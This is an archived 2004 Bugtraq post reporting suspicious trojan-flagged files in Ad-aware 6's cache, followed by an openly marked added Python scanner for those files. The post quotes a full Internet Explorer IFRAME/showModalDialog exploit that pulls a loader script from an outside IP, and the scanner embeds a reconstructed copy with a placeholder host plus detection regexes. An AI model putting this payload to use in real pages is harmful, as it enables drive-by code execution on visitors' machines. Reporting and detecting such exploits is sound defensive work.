[35417] in bugtraq


Unusual Activity in Ad-aware 6 Personal, Build 6.181

daemon@ATHENA.MIT.EDU (fedhead)
Tue Jun 22 01:36:12 2004

From: "fedhead" <fedhead@rogers.com>
To: "bugtraq" <bugtraq@securityfocus.com>
Date: Sun, 20 Jun 2004 10:36:16 -0400
Message-ID: <LIEKJLEBDKKNBDDGIJAAAEBECFAA.fedhead@rogers.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit

Sorry about my previous post, Norton picked up the html code and filtered my
e-mail. Here is the original post without the html flags.

Hello,

My apologies if I am posting in the wrong list but I am not sure if this is
a known issue in Ad-aware or if this even is an issue with Ad-aware.

I have written a script to run ad-aware to scan the registry and files from
Windows XP Scheduled tasks:

rem Scan the local registry
"C:\Program Files\Lavasoft\Ad-Aware 6\Ad-Aware.exe" +c +1 +A

rem Scan the file system:
"C:\Program Files\Lavasoft\Ad-Aware 6\Ad-Aware.exe" C:\ +a +1 +A

Seems benign enough. Every night when it runs, after the first scan of the
registry, it creates four files in the C:\Program Files\Lavasoft\Ad-Aware
6\cache folder which Norton AV catches as trojan scripts:

exploit.chm
installer.htm
shellscript.js
shellscript_loader.js

In installer.htm, it appears to use one of the IE IFRAME exploits to
download the JavaScript files.

cat installer.htm

<script language="Javascript">

    function InjectedDuringRedirection(){

        showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'http://62.131.86.111/security/idiots/repro/shellscript_loader.js\\'><\/script>'";
    }

</script>

<script language="javascript">

    setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
    setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
    document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.jsp" WIDTH=200 HEIGHT=200></IFRAME>');

</script>


The most unusual part is that it happens at the end of the registry scan in
Ad-aware. A Google search doesn't turn up any relation between this exploit
and Ad-aware so it could be something unique to my system but at this point
I am at a loss as to what it could be.

I also have an 'image' of my Windows XP Pro install in a VMware where I have
been testing SP2 and the files also exist there as well.

Any info would be appreciated.

Thanks,
Matt

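As an added example (not part of Matt's post, and not a Lavasoft or Norton tool), here is a small Python check a defender could run against the Ad-Aware cache folder described above. It flags files by the dropped names listed in the post and by content markers taken from the quoted installer.htm: an off-screen showModalDialog, an execScript call, a javascript: URL that pulls a remote SCRIPT SRC, and an IFRAME written by script. The regexes, function names and the embedded sample are constructed for this example; the remote host in the sample is a placeholder.

```python
import re
from pathlib import Path

# Content indicators modelled on the installer.htm quoted in the post.
# Constructed regexes; the names are this example's own.
INDICATORS = {
    "offscreen_modal_dialog": re.compile(r"showModalDialog\([^)]*dialog(?:Top|Left):-\d+", re.I),
    "execscript_call": re.compile(r"\.execScript\(", re.I),
    "javascript_url_remote_script": re.compile(
        r"""location\s*=\s*["']javascript:.*?<SCRIPT\s+SRC=\\*['"]?https?://""", re.I | re.S),
    "iframe_written_by_script": re.compile(r"""document\.write\(\s*['"]<IFRAME""", re.I),
}

# File names reported in the post as appearing in the cache folder.
DROPPED_NAMES = {"exploit.chm", "installer.htm", "shellscript.js", "shellscript_loader.js"}

def scan_text(text):
    """Return the sorted names of the indicators present in a piece of HTML/JS."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def scan_cache_dir(cache_dir):
    """Look at each file directly inside cache_dir (e.g. the Ad-Aware cache folder)
    and report those whose name is in DROPPED_NAMES or whose content hits two or
    more indicators. Returns {file name: [indicator names]}."""
    findings = {}
    for path in Path(cache_dir).iterdir():
        if not path.is_file():
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        hits = scan_text(text)
        if path.name.lower() in DROPPED_NAMES or len(hits) >= 2:
            findings[path.name] = hits
    return findings

# Constructed sample mirroring the structure of the quoted installer.htm
# (remote host replaced by a placeholder).
SAMPLE_INSTALLER = r"""<script language="Javascript">
function InjectedDuringRedirection(){
 showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'http://REMOTE-HOST.example/shellscript_loader.js\\'><\/script>'";
}
</script>
<script language="javascript">
setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.jsp" WIDTH=200 HEIGHT=200></IFRAME>');
</script>"""

if __name__ == "__main__":
    print(scan_text(SAMPLE_INSTALLER))
```

Point scan_cache_dir at the real cache directory to get the same report for files on disk.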